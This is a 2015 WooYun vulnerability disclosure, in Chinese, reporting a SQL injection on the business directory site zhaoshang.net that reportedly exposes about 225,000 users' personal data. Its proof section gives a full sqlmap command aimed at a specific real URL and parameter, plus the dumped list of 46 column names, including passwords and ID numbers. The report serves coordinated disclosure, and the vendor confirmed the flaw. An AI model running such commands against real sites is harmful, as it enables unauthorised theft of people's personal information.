当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097669

漏洞标题:中国招商网高危SQL注入漏洞可导致数据库内敏感信息泄露

相关厂商:中国招商网

漏洞作者: 黑暗游侠

提交时间:2015-03-03 17:52

修复时间:2015-04-17 17:54

公开时间:2015-04-17 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

中国招商网高危SQL注入漏洞可导致数据库内敏感信息泄露

详细说明:

22.5万用户的46种信息造全泄露
包括个人帐号密码,真实姓名,身份证号,QQ,手机号,工作地及工作职务等46种个人信息
由于是招商网,这些账户很大都是一些企业家的个人信息,连带很多关系

漏洞证明:

Sqlmap -u "http://www.zhaoshang.net/biz/index.php?mod=brandlist"  --data="yetai=0&city=0&keyword=88952634" --dbs


以下为个人信息所泄漏的46个内容

+------------+
| "C-ZSpage" |
| Address    |
| BEmail     |
| CorpIntro  |
| CorpName   |
| Email      |
| FAX        |
| focus      |
| Hy_Dfenlei |
| Hy_Xfenlei |
| ID         |
| IDNumber   |
| IsShow     |
| IsStop     |
| jine       |
| jineid     |
| Mobile     |
| msg        |
| MSN        |
| mycredit   |
| Name       |
| pay        |
| postcode   |
| PWD        |
| PWDAnsW    |
| PWDQuest   |
| QQ         |
| qx         |
| qysj       |
| Sex        |
| SJ         |
| SJTime     |
| source     |
| szbm       |
| Tel        |
| type       |
| tzsm       |
| UserName   |
| UserType   |
| WebSite    |
| X_fenlei   |
| xuanze     |
| YIsStop    |
| YUserType  |
| zhiwu      |
| Zone       |
+------------+

修复方案:

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-04 08:14

厂商回复:

此漏洞我们已经发现正在修复,十分感谢关注。

最新状态:

暂无